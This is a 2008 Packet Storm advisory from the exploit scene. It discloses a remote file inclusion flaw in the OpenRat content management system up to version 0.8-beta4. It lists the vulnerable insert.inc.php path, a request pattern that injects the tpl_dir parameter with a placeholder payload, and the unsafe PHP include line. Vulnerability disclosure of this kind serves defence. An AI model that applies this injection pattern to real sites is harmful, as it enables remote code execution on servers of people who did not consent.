openrat-rfi.txt

2008-09-24T00:00:00
ID PACKETSTORM:70258
Type packetstorm
Reporter dun
Modified 2008-09-24T00:00:00

Description

                                        
                                            ` :::::::-. ... ::::::. :::.  
;;, `';, ;; ;;;`;;;;, `;;;  
`[[ [[[[' [[[ [[[[[. '[[  
$$, $$$$ $$$ $$$ "Y$c$$  
888_,o8P'88 .d888 888 Y88  
MMMMP"` "YmmMMMM"" MMM YM  
  
[ Discovered by dun \ dun[at]strcpy.pl ]  
  
#####################################################################  
# [ OpenRat <= 0.8-beta4 ] Remote File Inclusion Vulnerability #  
#####################################################################  
#  
# Script: "OpenRat is a free Web Content-Management-System."  
#  
# Script site: http://www.openrat.de/  
# Download: http://www.openrat.de/download/   
# http://dl.openrat.de/openrat-cvs-2007-12-05.tar.gz  
#  
# Vuln: http://site.com/openrat/themes/default/include/html/insert.inc.php?tpl_dir=[spread???]  
#   
#  
# Bug: ./openrat/themes/default/include/html/insert.inc.php  
#  
# ...  
# <?php include( $tpl_dir.$attr_file.'.tpl.php') ?>  
# ...   
#  
#  
###############################################  
# Greetz: D3m0n_DE * str0ke * and otherz..  
###############################################  
  
[ dun / 2008 ]   
  
*******************************************************************************************  
  
  
`